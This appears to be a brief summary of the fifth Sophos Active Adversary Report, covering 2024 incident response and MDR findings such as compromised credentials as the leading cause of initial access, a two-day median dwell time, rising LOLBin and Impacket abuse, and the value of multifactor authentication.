The fifth anniversary of the Sophos Active Adversary Report is being celebrated this year. The report originated from a simple question about what happens after a company is breached by attackers and how knowledge of the adversary’s tactics can assist defenders in combating active attacks. Originally named “The Active Adversary Playbook,” the report evolved into what it is today.
Over the past five years, the report has evolved to include data from both the Incident Response (IR) team and the Managed Detection and Response (MDR) team, providing insights and analysis on the evolving threat landscape. The 2024 dataset is now available for broader discussions and analysis. The data for this report was collected from cases handled in 2024 by both the IR and MDR teams, focusing on organizations with fewer than 1000 employees across various industries.
One key observation from the report is the differences between MDR and IR findings, highlighting the importance of active monitoring for better security outcomes. Compromised credentials remain a leading cause of initial access, emphasizing the importance of multi-factor authentication (MFA). Dwell time has decreased, with the median dwell time for all cases in 2024 being just two days.
An interesting trend observed is the rise in attacker abuse of living-off-the-land binaries (LOLBins) and the unique challenge of remote ransomware for actively managed systems. The report also delves into the root causes of breaches, with compromised credentials and exploiting vulnerabilities remaining prevalent.
The report also provides insights into the Tactics, Techniques, and Procedures (TTPs) used by attackers, highlighting the overlap between MDR and IR cases. Tools like Impacket have seen a significant increase in abuse, while the use of Cobalt Strike has decreased. The report also touches on the importance of multifactor authentication and the presence of unprotected systems in breached organizations.
An in-depth case study is discussed in the report, showcasing the impact of internal struggles with business processes on security incidents. The conclusion emphasizes the importance of enabling IT teams to focus on security while experts handle the threats. The report also acknowledges the contributions of various teams and individuals in the research process.
Overall, the Sophos Active Adversary Report provides valuable insights into the evolving threat landscape and the importance of proactive security measures in defending against cyber attacks. The data and methodology used in the report have been carefully curated to ensure confidentiality while providing meaningful insights for organizations to bolster their security defenses.